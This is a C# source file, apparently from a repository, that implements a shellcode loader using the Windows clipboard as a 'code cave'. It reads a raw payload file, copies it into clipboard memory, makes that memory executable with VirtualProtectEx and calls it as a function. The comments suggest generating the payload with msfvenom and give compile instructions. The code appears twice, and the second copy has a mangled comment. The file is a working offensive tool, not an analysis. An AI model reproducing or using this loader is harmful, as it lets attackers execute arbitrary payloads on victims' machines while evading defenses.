leftp/ClippyShellcodeInject.cs

## ClippyShellcodeInject.cs
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace ClippySCInject
{
    class Program
    {

        private delegate IntPtr test();
        static void Main(string[] args)
        {
            byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");
            OpenClipboard(IntPtr.Zero);
            GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned);
            IntPtr payloadpointer = payloadArray.AddrOfPinnedObject();
            IntPtr scData = SetClipboardData(2, payloadpointer);
            CloseClipboard();
            uint oldProtect = 0; //Old protect is RW by default
            if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect))
            {
                test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
                executesc();
            }
        }

        [DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)]
        private static extern bool OpenClipboard(IntPtr hWndNewOwner);

        [DllImport("User32.dll", SetLastError = true)]
        static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);

        [DllImport("user32.dll", SetLastError = true)]
        static extern bool CloseClipboard();

        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetCurrentProcess();

    }
}
	// Using the clipboard as your code cave.
	// Generate your shellcode with msfvenom or whatever
	// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

	using System;
	using System.IO;
	using System.Runtime.InteropServices;

	namespace ClippySCInject
	{
	class Program
	{

	private delegate IntPtr test();
	static void Main(string[] args)
	{
	byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");
	OpenClipboard(IntPtr.Zero);
	GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned);
	IntPtr payloadpointer = payloadArray.AddrOfPinnedObject();
	IntPtr scData = SetClipboardData(2, payloadpointer);
	CloseClipboard();
	uint oldProtect = 0; //Old protect is RW by default
	if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/RX/, out oldProtect))
	{
	test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
	executesc();
	}
	}

	[DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)]
	private static extern bool OpenClipboard(IntPtr hWndNewOwner);

	[DllImport("User32.dll", SetLastError = true)]
	static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);

	[DllImport("user32.dll", SetLastError = true)]
	static extern bool CloseClipboard();

	[DllImport("kernel32.dll")]
	static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

	[DllImport("kernel32.dll", SetLastError = true)]
	public static extern IntPtr GetCurrentProcess();

	}
	}